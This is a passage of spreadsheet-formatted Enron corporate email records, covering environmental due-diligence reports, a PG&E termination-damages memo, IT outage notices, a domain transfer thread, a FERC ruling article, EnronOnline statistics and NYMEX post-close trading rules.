Bowles.  Don Stevens conducted a site visit on June 6 - 7, 2001.  Potential=_x000D_
=20_x000D_
issues observed during the site visit include water discharge permit issues=_x000D_
=20_x000D_
and the observance of numerous monitoring wells located on the adjacent=20_x000D_
15-acre site.=20_x000D_
_x000D_
Andex Resources - Don Stevens reviewed the environmental inspection report=_x000D_
=20_x000D_
done by Environmental Disaster Control, Inc. regarding O&amp;G properties locat=_x000D_
ed=20_x000D_
in Mississippi, Texas and Wyoming.  These properties are associated with a=_x000D_
=20_x000D_
request from Andex for Enron to enter into another VPP deal with them.  The=_x000D_
=20_x000D_
environmental consultant did not follow the scope of work that Enron EHS=20_x000D_
provided.  There does not appear to be any action plans or planned follow-u=_x000D_
p=20_x000D_
to recommendations or data gaps.=20_x000D_
_x000D_
KCS Medallion Resources, Inc. (KCS) -  Enron is considering a second VPP=20_x000D_
arrangement with KCS in which KCS would acquire O &amp; G properties (6 shallow=_x000D_
=20_x000D_
wells and 14 deep wells)  owned by Union Gas Operating Company and located =_x000D_
in=20_x000D_
Dewitt, Goliad and Victoria Counties, Texas.  KCS retained Kane Environment=_x000D_
al=20_x000D_
Engineering, Inc. to conduct a Phase I Environmental Site Assessment report=_x000D_
.=20_x000D_
Don Stevens reviewd the Kane environmental report and participated in a=20_x000D_
conference call with Teresa Bushman (internal counsel, Enron Credit=20_x000D_
Resources), Arville Martin (ECR commercial), and Marshall Eubanks (ECR=20_x000D_
Commercial) to discuss the report.  The report included recommendation=20_x000D_
regarding SPCC Plans, SARA Tittle III, and Title V permitting (regarding=20_x000D_
dyhyds); however, there is no planned follow-up or action items with KCS._x000D_
_x000D_
_x000D_
DEPARTMENT PROJECTS_x000D_
_x000D_
Quantitative Risk Module - Don Stevens continues to evaluate the draft=20_x000D_
software program.  ThermoRetec is scheduled to conduct training on the=20_x000D_
software June 21 - 22, 2001 and beta testing should follow in July._x000D_
_x000D_
EHS Annual Report =01) Gavin Dillingham is working with Susan Worthen in=20_x000D_
compiling EHS performance charts for the annual report. GHG emissions data=_x000D_
=20_x000D_
continues to roll in and missing data/assets were provided to Henry Van. =_x000D_
=20_x000D_
Susan received comments from Kelly Kimberly and is working to reconcile=20_x000D_
comments with the original authors and verify information.  Susan expects t=_x000D_
o=20_x000D_
review the final draft report, including performance charts, with MFT next=_x000D_
=20_x000D_
week._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Staff Mtg. Conference room EB4102</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	 Staff Mtg. Conference room EB4102_x000D_
_x000D_
Date:		1/22/2001_x000D_
Time:		11:00 AM - 1:00 PM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 23:20:46 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'customerservice@industrialinfo.com'})</t>
  </si>
  <si>
    <t>Daily Outage Updates (excluding WSCC)</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Paul Thomas,_x000D_
_x000D_
 This is an automated email delivery.  The following info is for_x000D_
 tracking purposes only:_x000D_
_x000D_
 Transaction: 0000188591_x000D_
 Fulfillment: 00203618*00002_x000D_
 Location   : 00007_x000D_
_x000D_
 Industrial Information Resources, Inc._x000D_
 Customer Service Department_x000D_
 (713) 783-5147_x000D_
_x000D_
_x000D_
 - OUTAGE.dbf </t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 10:05:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>Dinner Gary Gault - 6:15</t>
  </si>
  <si>
    <t>403-870-8015 - Gary Cell</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 06:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>LA Times article -- CA investigates trading floors</t>
  </si>
  <si>
    <t>http://www.latimes.com/news/state/20010601/t000045783.html_x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 02:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jonathan.mckay@enron.com', 'cheryl.dawes@enron.com', 'peggy.hedstrom@enron.com', 'greg.johnston@enron.com'})</t>
  </si>
  <si>
    <t>PG&amp;E Termination Damages - Privileged and Confidential</t>
  </si>
  <si>
    <t>To confirm, I am away from the office Thursday April 12 through Thursday _x000D_
April 19, but reachable by cell at most times.  As Thursday is the Early _x000D_
Termination Date, the following will need to be completed in my absence (with _x000D_
Section references to PG&amp;E's Oct. 99 form of Master):_x000D_
_x000D_
1.  PEGGY/JON:  Unless a replacement deal has been entered into, cut NITs as _x000D_
of 8:00 am Thursday morning._x000D_
_x000D_
2.  GREG:  Determine an estimate of our (i.e. ECC) costs and expenses as a _x000D_
result of the Default by PG&amp;E, including for Canadian and US counsel under _x000D_
Section 12.2, and estimating future costs and expenses to be incurred._x000D_
_x000D_
3.  CHERYL/JON/GREG:  Determine receivables owing as of the Early Termination _x000D_
Date under Section 12.3, noting the portion that is pre-petition and the _x000D_
portion that is post-petition. _x000D_
_x000D_
4.  JON/GREG:  Obtain quotes from 3 dealers for the Market Value of the _x000D_
terminated Transactions under Section 12.4.  Greg needs to sit with Jon when _x000D_
the quotes are obtained, on a taped line, following the outline prepared by _x000D_
Houston for Portland.  The quotes obtained are to be entered into the log _x000D_
sheets prepared by Credit, and returned to Credit.  The calls are to be saved _x000D_
and kept by IT on tape/CD.  Quotation confirmation forms are to be completed _x000D_
and sent to the dealers providing the quotes, and their return pursued.  A _x000D_
single, aggregated MTM/early termination/liquidation amount for the _x000D_
terminated Transactions is to be determined by comparing the Market Value to _x000D_
the Contract Value and using the Prime Rate as the discount factor under _x000D_
Section 12.5._x000D_
_x000D_
5.  CHERYL/JON/GREG:  Prepare our claim as the aggregate of 2 (costs and _x000D_
expenses), 3 (receivables) and 4 (MTM) above.  Organize documentation and _x000D_
quantification in a binder and send copies to Jeff Hodge and Elizabeth _x000D_
Sager.  Once Jeff/Elizabeth have approved, to formalize the claim send a _x000D_
notice with a copy of our claim and demand for payment to PG&amp;E under Article _x000D_
15 of the Master, with payment due on the next Business Day under Section _x000D_
12.4(iv).  US counsel under Elizabeth Sager's supervision should then pursue _x000D_
recovery through the bankruptcy proceedings, including by exercising any _x000D_
direct or affiliate set offs to other positions._x000D_
_x000D_
6.  JON/GREG:  If it has not been negotiated and documented before I leave, a _x000D_
replacement transaction for the 75MM/day may have to be put in place with _x000D_
PG&amp;E, hopefully under our paper (GTC) with whatever amendments (i.e. _x000D_
California law) are approved by Jeff Hodge.  We may have to use their paper _x000D_
(Master) if necessary and approved by Jeff Hodge to obtain the security _x000D_
interest in their receivables - in which case certain (not all) of the _x000D_
amendments to their paper that we have been requesting will need to be made._x000D_
_x000D_
Peter.</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 11:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'reactions@euromoneyplc.com'})</t>
  </si>
  <si>
    <t>Introducing ...INSURANCE FINANCE &amp; INVESTMENT</t>
  </si>
  <si>
    <t xml:space="preserve">Introducing ...INSURANCE FINANCE &amp; INVESTMENT _x000D_
Insurance Finance &amp; Investment is the only newsletter that provides the _x000D_
insurance industry's top corporate executives, bankers and portfolio _x000D_
managers with information they can use right away. Get the inside scoop on _x000D_
industry mergers &amp; acquisitions and demutualizations, upcoming equity and _x000D_
debt offerings, the latest financing strategies from insurance companies' as _x000D_
well as money managers' investment strategies. _x000D_
_x000D_
????? Go to http://www.iiinsurance.com </t>
  </si>
  <si>
    <t>Thu, 31 May 2001 15:01:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>_x000D_
------------------------------------------------------------------------------------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
June 1, 2001 5:00pm through June 4, 2001 12:00am_x000D_
------------------------------------------------------------------------------------------------------_x000D_
_x000D_
_x000D_
ECS to ECN Network Interconnection, June 9th 2001_x000D_
_x000D_
This is a notification that the Enron Corp. I/T Networks team will be connecting the new building network infrastructure located in Enron Center South (ECS) to the existing Enron Center North (ECN) backbone network.  While this activity is not expected to produce a disruption to network services, this notice is designed to alert the organization to our activities.  No network hardware or systems are anticipated to be shutdown.  The actual physical interconnection of the networks will be performed in the EB 34th floor Data Center._x000D_
_x000D_
Interconnection activities are scheduled to occur the evening of June 9th 2001 starting from 7:00 p.m.(CT) and completing around 11:00 p.m. (CT). Application testing activities will begin at 11:00 p.m. (CT) once all network testing has completed._x000D_
_x000D_
If you have any further questions, please contact Pete Castrejana at 713-410-0642 for more information.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NS_x000D_
Time:  Fri 6/1/2001 at  11:00:00 PM CT thru Fri 6/1/2001 at  11:45:00 PM CT_x000D_
	Fri 6/1/2001 at    9:00:00 PM PT thru Fri 6/1/2001 at     9:45:00 PM PT_x000D_
	Sat 6/2/2001 at  5:00:00 AM London thru Sat 6/2/2001 at  5:45:00 AM London_x000D_
Outage:  Enable routing on new router ecn-34-cor-ccr1_x000D_
Environments Impacted:  ENS_x000D_
Purpose: This router will be used to connect to the new building_x000D_
Backout: remove routing on the router._x000D_
Contact(s): 	Scott Shishido    713-853-9780_x000D_
_x000D_
Impact:  AEP_x000D_
Time:  Fri 6/1/2001 at  8:00:00 PM CT thru Fri 6/1/2001 at  8:30:00 PM CT_x000D_
	Fri 6/1/2001 at  6:00:00 PM PT thru Fri 6/1/2001 at  6:30:00 PM PT_x000D_
	Sat 6/2/2001 at  2:00:00 AM London thru Sat 6/2/2001 at  2:30:00 AM London_x000D_
Outage:  Shutting off the internal link to 1201 Louisiana_x000D_
Environments Impacted:  AEP_x000D_
Purpose: Company occupying that space has been sold._x000D_
Backout: None_x000D_
Contact(s): 	Garhett Clark         713-345-9953_x000D_
                        Robert Humlicek   713-853-6366   713-406-8293_x000D_
		    		    		    		_x000D_
Impact:  ENS/GCO_x000D_
Time:  Fri 6/1/2001    thru Wed 7/4/2001   _x000D_
Outage:  HPL migration to AEP_x000D_
Environments Impacted:  GCO_x000D_
Purpose: Sites sold_x000D_
Backout: None_x000D_
Contact(s): 	Garhett Clark         713-345-9953_x000D_
		Robert Humlicek   713-853-6366   713-406-8293_x000D_
_x000D_
FIELD SERVICES:  No Scheduled Outages._x000D_
_x000D_
INTERNET: _x000D_
Impact:  Internet_x000D_
Time:  Fri 6/1/2001 at  10:30:00 PM CT thru Fri 6/1/2001 at  10:45:00 PM CT_x000D_
	Fri 6/1/2001 at    8:30:00 PM PT thru Fri 6/1/2001 at     8:45:00 PM PT_x000D_
	Sat 6/2/2001 at  4:30:00 AM London thru Sat 6/2/2001 at  4:45:00 AM London_x000D_
Outage:  Reboot Enron.com edge routers_x000D_
Environments Impacted:  Internet_x000D_
Purpose: Regular reboot to prevent such problems as memory corruption. Intermettent disruption to last about five minutes._x000D_
Backout: _x000D_
Contact(s): 	John Shupak          713-853-7943_x000D_
		Bryan Aubuchon    713-345-8446 _x000D_
 _x000D_
MESSAGING: _x000D_
Impact:  Corp Notes_x000D_
Time:  Fri 6/1/2001 at  9:00:00 PM CT thru Sat 6/2/2001 at  1:00:00 AM CT_x000D_
	Fri 6/1/2001 at  7:00:00 PM PT thru Fri 6/1/2001 at 11:00:00 PM PT_x000D_
	Sat 6/2/2001 at  3:00:00 AM London thru Sat 6/2/2001 at  7:00:00 AM London_x000D_
Outage:  cNotes Server Reboots_x000D_
Environments Impacted:  All users on any of the mailservers listed below_x000D_
Purpose: Scheduled @ 2 week interval_x000D_
Backout: Make sure server comes up._x000D_
Contact(s): 	Trey Rhodes  (713) 345-7792  _x000D_
		    		    		    		_x000D_
Impact:  EI_x000D_
Time:  Fri 6/1/2001 at  9:00:00 PM CT thru Sat 6/2/2001 at  1:00:00 AM CT_x000D_
	Fri 6/1/2001 at  7:00:00 PM PT thru Fri 6/1/2001 at 11:00:00 PM PT_x000D_
	Sat 6/2/2001 at  3:00:00 AM London thru Sat 6/2/2001 at  7:00:00 AM London_x000D_
Outage:  EI Notes Server Maintenance_x000D_
Environments Impacted:  EI Local/Domestic/Foreign Sites_x000D_
Purpose: Scheduled @ 2 week interval_x000D_
Backout: N/A_x000D_
Contact(s): 	David Ricafrente    713-646-7741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Tue, 9 May 2000 09:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Domain name transfer agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Mark:_x000D_
Could you please answer Mark's question?  Alos, Jason Peters and I are still _x000D_
looking at this and we will call you with any further comments that we have._x000D_
Carol_x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 05/09/2000 04:38 PM -----_x000D_
_x000D_
	Mark Holsworth@ENRON_x000D_
	05/09/2000 01:36 PM_x000D_
		_x000D_
		 To: Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: Mark Palmer/Corp/Enron@ENRON, Rex Rogers/Corp/Enron@Enron_x000D_
		 Subject: Re: Domain name transfer agreement_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
ATTORNEY CLIENT  PRIVILEGED._x000D_
_x000D_
_x000D_
_x000D_
The assignment looks fine, but I don't understand the underlying _x000D_
transaction.  Is EEL transferring this domain name "WEATHER-DESK.COM" without _x000D_
any consideration other than using RMS' software program for six months?_x000D_
_x000D_
Before executing this agreement, you need to secure Mark Palmer's permission _x000D_
since the agreement states that no variation of the name may be used.  He is _x000D_
the vice president of advertising at Enron Corp.  I have copied him on this._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carol St Clair@ECT_x000D_
05/09/2000 10:54 AM_x000D_
To: Mark Holsworth/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Domain name transfer agreement_x000D_
_x000D_
Mark:_x000D_
Could you please take a quick look at this too and let me know if  you have _x000D_
any comments?  I'm at 33989.  Thanks._x000D_
Carol_x000D_
---------------------- Forwarded by Carol St Clair/HOU/ECT on 05/09/2000 _x000D_
10:53 AM ---------------------------_x000D_
_x000D_
_x000D_
Mark Tawney_x000D_
05/09/2000 09:41 AM_x000D_
To: Carol St Clair/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Domain name transfer agreement_x000D_
_x000D_
Could you please review this agreement.  Please call if you need some _x000D_
background information._x000D_
---------------------- Forwarded by Mark Tawney/HOU/ECT on 05/09/2000 08:44 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  David Kistler                           05/03/2000 09:53 PM_x000D_
	_x000D_
_x000D_
To: Mark Tawney/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Domain name transfer agreement_x000D_
_x000D_
_x000D_
---------------------- Forwarded by David Kistler/HOU/ECT on 05/03/2000 09:53 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
PaulV@riskinc.com on 05/03/2000 04:05:33 PM_x000D_
To: mtawney@ect.enron.com, mtawney@enron.com, mark.tawney@enron.com_x000D_
cc: david.kistler@enron.com, MonicaL@riskinc.com _x000D_
Subject: Domain name transfer agreement_x000D_
_x000D_
_x000D_
Mark_x000D_
_x000D_
Not sure of your exact email address but hopefully one of these is correct._x000D_
Can you please confirm that you receive this?_x000D_
_x000D_
Below is the agreement our attorneys have drafted for the transfer of the_x000D_
www.weather-desk.com domain name.  Note that they have recommended that a_x000D_
few of the more specific details regarding the corresponding Enron usage of_x000D_
the RMS weather model be addressed in a simple but separate license_x000D_
agreement.   As discussed, in addition to general confidentialiy_x000D_
provisions, those terms will include (1) the access will not cover any_x000D_
international weather data that may be added to the system during the term_x000D_
of use through December 31, as our costs associated with such data are_x000D_
uncertain and (2) the use of the model will be for Enron internal purposes_x000D_
only with no data or analysis results to be shared with third parties._x000D_
_x000D_
I would appreciate if you can forward this to your legal dept. to review so_x000D_
that we can hopefully get this resolved quickly._x000D_
_x000D_
Thanks/regards_x000D_
_x000D_
Paul_x000D_
_x000D_
(See attached file: EnronTransferAgmt.DOC)_x000D_
 - EnronTransferAgmt.DOC_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 07:23:38 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jan.moore@enron.com', 'dave.neubauer@enron.com', "paul.y'barbo@enron.com", 'gina.taylor@enron.com', 'tk.lohman@enron.com', 'lon.stanton@enron.com', 'kevin.hyatt@enron.com', 'drew.fossum@enron.com', 'w..mcgowan@enron.com', 'lee.huber@enron.com', 'michael.loeffler@enron.com', 'maria.pavlou@enron.com', 'kimberly.watson@enron.com', 'steven.harris@enron.com', 'glen.hass@enron.com', 'jim.talcott@enron.com', 'j..porter@enron.com', 'rob.wilson@enron.com', 'lorraine.lindberg@enron.com', 'dari.dornan@enron.com', 'pallavi.goradia@enron.com', 'tony.pryor@enron.com', 'michelle.lokay@enron.com', 'lindy.donoho@enron.com', 'mark.mcconnell@enron.com'})</t>
  </si>
  <si>
    <t>NGI Article on TW Ruling</t>
  </si>
  <si>
    <t>NGI's Daily Gas Price Index _x000D_
published : October 29, 2001_x000D_
ALJ Clears Transwestern of Market Power Charges _x000D_
A FERC administrative law judge has found no improprieties, nor evidence of the exercise of market power in negotiated rate contracts between Transwestern Pipeline and two shippers on its system, which resulted in the shippers being charged as much as $27/MMBtu last February, far in excess of the pipeline's allowed transportation rate of 38 cents/MMBtu (RP97-288-009). _x000D_
ALJ Jacob Leventhal had only one fault to find, and that was with Transwestern's method of posting capacity. The judge said, and Transwestern agreed, to modify its tariff "so that all posting, bidding and award procedures are set forth in a separate provision with an appropriate caption" on its Internet bulletin board. Shippers had said that reviewing capacity on the Transwestern web site was "a tortuous process." _x000D_
Indicated Shippers claimed Transwestern's inadequate capacity posting and award procedures did not provide all interested parties with an opportunity to bid for the capacity that was available. _x000D_
While "both Indicated Shippers and (FERC) Staff find it curious that SET (Sempra Energy Trading) and Richardson (Products Co.) were the sole bidders on the contracts awarded to each of them...curiosity does not translate into proof," the judge said. Witnesses in the expedited hearing testified no bids were considered in advance of the capacity posting.  The judge subsequently found the capacity was awarded in a manner consistent with Transwestern's tariff. _x000D_
Similarly, Levanthal could find no evidence that Transwestern exercised market power in negotiating the rates with shippers or withholding or threatening to withhold capacity. The capacity was available at recourse rates, and the shippers knew those rates were available. "Staff's arguments really are criticisms of the posting and award procedures, but do not demonstrate the exercise of market power." _x000D_
The two shippers said they made a business decision to propose the "index-to-index" formula that produced the higher rates, rather than take the recourse rate "to minimize any risk on transportation options." The index-to-index formula refers to taking the difference between the daily published commodity prices at two different points and subtracting to get the transportation rate between them. In this case the two points were the San Juan Basin and the SoCal Needles delivery point. _x000D_
The case was set for expedited hearing last summer by the commissioners acting on staff recommendations.</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 11:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EnronOnline Management Report for October 6, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the New Executive Summary. Starting today, October 9th, the _x000D_
Management Report will no longer be sent on a daily basis but will be _x000D_
delivered on a weekly basis each Monday. The Executive Summary will continue _x000D_
to be sent on a daily basis._x000D_
_x000D_
EnronOnline Executive Summary for 10/06/00_x000D_
Transaction Summary	_x000D_
External Transactions Today	2,796_x000D_
Average Daily External Transactions (30 day Trailing Avg)	2,514_x000D_
Total Life to Date Transactions*	343,663_x000D_
_x000D_
EnronOnline Percentage of Entity's Total Transactions for 	10/06/00_x000D_
Enron North America	77%_x000D_
Enron Europe Limited	34%_x000D_
GLOBAL PRODUCTS	26%_x000D_
Enron Metals	5%_x000D_
_x000D_
Gross Notional Value of EnronOnline Transactions	Total_x000D_
Today	1,994,263,133_x000D_
MTD	177,270,202,850_x000D_
LTD	178,483,444,967_x000D_
Average Daily Notional Value (30 Day Trailing Avg)	1,655,850,851_x000D_
	_x000D_
Notional Revenue from Physical Flows to Date	12,473,831,049_x000D_
_x000D_
Counterparties, Users, and Products Offered	_x000D_
Counterparties having transacted to date	503_x000D_
New Counterparties transacting for the first time today	1_x000D_
Number of Products Offered Today	1,113_x000D_
Total Number of External Users Logged on Today	2,404_x000D_
Average # of External Users logged on (30 day Trailing Avg)	2,453_x000D_
_x000D_
_x000D_
Also attached is the Public Domain Report, containing information which is _x000D_
intended for use in presentations or reports which will be seen by _x000D_
individuals outside Enron. Starting Today, October 9th, the Public Report _x000D_
will also be delivered on a weekly basis._x000D_
_x000D_
                      </t>
  </si>
  <si>
    <t>Wed, 9 May 2001 08:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>(01-156) NYMEX Post-Close Trading Session Rules</t>
  </si>
  <si>
    <t xml:space="preserve">Notice # 01-156_x000D_
May 9, 2001_x000D_
_x000D_
TO:_x000D_
All NYMEX Members and Member Firms_x000D_
_x000D_
FROM:_x000D_
Neal L. Wolkoff, Executive Vice President_x000D_
_x000D_
RE:_x000D_
NYMEX Post-Close Trading Session Rules_x000D_
_x000D_
DATE:_x000D_
May 8, 2001_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
_x000D_
This Notice advises Members and Member Firms of changes to the two post-clo=_x000D_
se=20_x000D_
session rules applicable to the NYMEX Division._x000D_
_x000D_
! As a result of amendments to both rules, the post-close sessions generall=_x000D_
y=20_x000D_
offered Monday-Thursday will be the same as the Friday sessions with two=20_x000D_
exceptions._x000D_
_x000D_
! Monday-Thursday. These sessions will start at 3:25 p.m. and will be two=_x000D_
=20_x000D_
minutes long._x000D_
_x000D_
! Fridays. These sessions will start at 3:30 p.m. and will be five minutes=_x000D_
=20_x000D_
long._x000D_
_x000D_
_x000D_
End of Week Post-Close Trading Session (Rule 6.57A)_x000D_
_x000D_
As a reminder and as a follow-up to a Notice distributed last week, please =_x000D_
be=20_x000D_
advised that beginning on Friday, May 11, 2001, a number of amendments to=_x000D_
=20_x000D_
NYMEX Rule 6.57A, the NYMEX End of Week post-close trading session rule, wi=_x000D_
ll=20_x000D_
become effective. The new version of this rule is attached below._x000D_
_x000D_
For Friday post-close sessions (and for post-close sessions the day before =_x000D_
a=20_x000D_
mid-week Exchange holiday) the following changes will be in effect:_x000D_
_x000D_
(1) Eligible contract months will be expanded from the first four to the=20_x000D_
first 12 consecutive listed contract months._x000D_
_x000D_
(2) The sessions now will be 5 minutes in duration._x000D_
_x000D_
(3) The trading range for these sessions will be expanded by adding the=20_x000D_
following ticks above (below) the_x000D_
daily high (low) for the applicable contract month (provided that this=20_x000D_
expanded trading range does not violate the maximum permissible price=20_x000D_
fluctuation limits then in effect):_x000D_
_x000D_
Crude Oil  20 ticks_x000D_
Heating Oil   50 ticks_x000D_
Unleaded Gas   50 ticks_x000D_
Natural Gas  50 ticks_x000D_
_x000D_
_x000D_
Monday-Thursday Post-Close Trading Sessions (Rule 6.57)_x000D_
_x000D_
In addition, please be advised that beginning on Monday, May 14, 2001, a=20_x000D_
number of amendments to NYMEX Rule 6.57, the Exchange=01,s post-close tradi=_x000D_
ng=20_x000D_
session rule for days other than Fridays, will become effective.  The new=_x000D_
=20_x000D_
version of this rule is attached below._x000D_
_x000D_
(1) Eligible contract months will be expanded from the first four to the=20_x000D_
first 12 consecutive listed contract months._x000D_
_x000D_
(2) The trading range for these sessions will be expanded by adding the=20_x000D_
following ticks above (below) the_x000D_
daily high (low) for the applicable contract month (provided that this=20_x000D_
expanded trading range does not violate the maximum permissible price=20_x000D_
fluctuation limits then in effect):_x000D_
_x000D_
Crude Oil  20 ticks_x000D_
Heating Oil   50 ticks_x000D_
Unleaded Gas   50 ticks_x000D_
Natural Gas  50 ticks_x000D_
_x000D_
(3) Customer participation will be expanded to the same extent as is=20_x000D_
permitted for the End of Week Post Close Session. Please note that any orde=_x000D_
r=20_x000D_
submitted during the RTH session, including but not limited to resting orde=_x000D_
rs=20_x000D_
such as stop orders, limit orders and good until cancelled (GTC) orders, wi=_x000D_
ll=20_x000D_
be deemed to have expired as of the end of RTH for purposes of this Session=_x000D_
. =20_x000D_
Accordingly, in the event that a market participant with such an expired=20_x000D_
order seeks to participate in the Session, a new order must be submitted._x000D_
_x000D_
(4) As a consequence of the expanded trading range and customer=20_x000D_
participation, trades done during this period will be price reported on PRS=_x000D_
._x000D_
_x000D_
Finally, please be advised that, as a matter of practice, the Exchange does=_x000D_
=20_x000D_
not currently offer post-close trading sessions for Propane futures contrac=_x000D_
ts._x000D_
_x000D_
If you have any questions concerning these changes, please contact George=_x000D_
=20_x000D_
Henderson, Vice President, NYMEX Floor Department, at (212) 299-2071; Rob=_x000D_
=20_x000D_
Stasi, Manager of Trading Floor Systems, NYMEX Floor Department, at (212)=_x000D_
=20_x000D_
299-2067, or Brian Regan, Senior Associate General Counsel, at (212) 299-22=_x000D_
07._x000D_
_x000D_
NEW VERSIONS OF  NYMEX RULE 6.57(=01&amp;POST-CLOSE TRADING SESSION=018) AND_x000D_
NYMEX RULE 6.57A (=01&amp;END OF WEEK TRADING SESSION=018)_x000D_
_x000D_
Rule 6.57.  (=01&amp;POST-CLOSE TRADING SESSION=018)_x000D_
_x000D_
Fifteen (15) minutes after the close of trading in all futures contracts, o=_x000D_
r=20_x000D_
five (5) minutes after the closing range is established for all applicable=_x000D_
=20_x000D_
contract months other than contract months in the Sour Crude Oil futures=20_x000D_
contract, whichever is later, trading shall resume for a period of two (2)=_x000D_
=20_x000D_
minutes (the ``Session'') in all energy futures contracts, subject to the=_x000D_
=20_x000D_
following conditions:_x000D_
_x000D_
(A) Trading during the Session shall be limited to the first twelve listed=_x000D_
=20_x000D_
delivery months;_x000D_
_x000D_
(B) Trades occurring during the Session for a particular contract month of =_x000D_
a=20_x000D_
futures contract shall be executed openly and competitively at a price with=_x000D_
in=20_x000D_
the daily trading range of the applicable contract month for that futures=_x000D_
=20_x000D_
contract and as further expanded above the daily high and below the daily l=_x000D_
ow=20_x000D_
only for the contracts listed below provided however that no such expanded=_x000D_
=20_x000D_
trading range may exceed the price fluctuation limits in effect for the=20_x000D_
applicable contract as of the end of the RTH session:_x000D_
_x000D_
Contract    Additional Ticks_x000D_
_x000D_
Crude Oil    20 ticks_x000D_
Natural Gas    50 ticks_x000D_
Unleaded Gasoline   50 ticks_x000D_
Heating Oil    50 ticks_x000D_
_x000D_
(C) During the Session, Floor Members, Floor Brokers and their customers ma=_x000D_
y=20_x000D_
participate in the same manner as trading occurring during the regular RTH=_x000D_
=20_x000D_
session, except that any order submitted during the RTH session, including=_x000D_
=20_x000D_
but not limited to resting orders such as stop orders, limit orders and goo=_x000D_
d=20_x000D_
until cancelled (GTC) orders, will be deemed to have expired as of the end =_x000D_
of=20_x000D_
RTH for purposes of this Session.  Accordingly, in the event that a market=_x000D_
=20_x000D_
participant with such an expired order seeks to participate in the Session,=_x000D_
 a=20_x000D_
new order must be submitted._x000D_
_x000D_
(D) Prices for trades executed during the Session shall be reported on publ=_x000D_
ic=20_x000D_
ticker services as current market prices and trades executed during the=20_x000D_
Session shall not be considered in determining any settlement price; and_x000D_
_x000D_
(E) Floor Members executing trades during the Session shall mark a line=20_x000D_
across their trading cards prior to the entry of a Session trade._x000D_
_x000D_
Rule 6.57A.  END OF WEEK TRADING SESSION_x000D_
_x000D_
On the last trading day of the calendar week, and, in any week when an=20_x000D_
Exchange holiday falls on a Tuesday, Wednesday or Thursday on the trading d=_x000D_
ay=20_x000D_
preceding such midweek Exchange holiday, there shall be no post-close tradi=_x000D_
ng=20_x000D_
session provided on the trading floor pursuant to Rule 6.57.  Instead, on=_x000D_
=20_x000D_
such dates, an end of week trading session (the =01&amp;End of Week Session'') =_x000D_
shall=20_x000D_
commence on the trading floor pursuant to this rule and subsequent to the=_x000D_
=20_x000D_
close.  Except as otherwise provided by the President or the President=01,s=_x000D_
=20_x000D_
designee for a particular trade date, such End of Week Session shall commen=_x000D_
ce=20_x000D_
twenty (20) minutes after the close of trading in all futures contracts and=_x000D_
=20_x000D_
shall continue for a period of  five (5) minutes in all energy and metals=_x000D_
=20_x000D_
futures contracts, subject to the following conditions:_x000D_
_x000D_
(A) Trading during the End of Week Session shall be limited to the first=20_x000D_
twelve listed delivery months;_x000D_
_x000D_
(B) Trades occurring during the End of Week Session for a particular contra=_x000D_
ct=20_x000D_
month of a futures contract shall be executed openly and competitively at a=_x000D_
=20_x000D_
price within the daily trading range of the applicable contract month for=_x000D_
=20_x000D_
that futures contract and as further expanded above the daily high and belo=_x000D_
w=20_x000D_
the daily low only for the contracts listed below provided however that no=_x000D_
=20_x000D_
such expanded trading range may exceed the price fluctuation limits in effe=_x000D_
ct=20_x000D_
for the applicable contract as of the end of the RTH session:_x000D_
_x000D_
Contract    Additional Ticks_x000D_
_x000D_
Crude Oil    20 ticks_x000D_
Natural Gas    50 ticks_x000D_
Unleaded Gasoline   50 ticks_x000D_
Heating Oil    50 ticks_x000D_
_x000D_
(C) During the End of Week Session, Floor Members, Floor Brokers and their=_x000D_
=20_x000D_
customers may participate in the same manner as trading occurring during th=_x000D_
e=20_x000D_
regular RTH session, except that any order submitted during the RTH session=_x000D_
,=20_x000D_
including but not limited to resting orders such as stop orders, limit orde=_x000D_
rs=20_x000D_
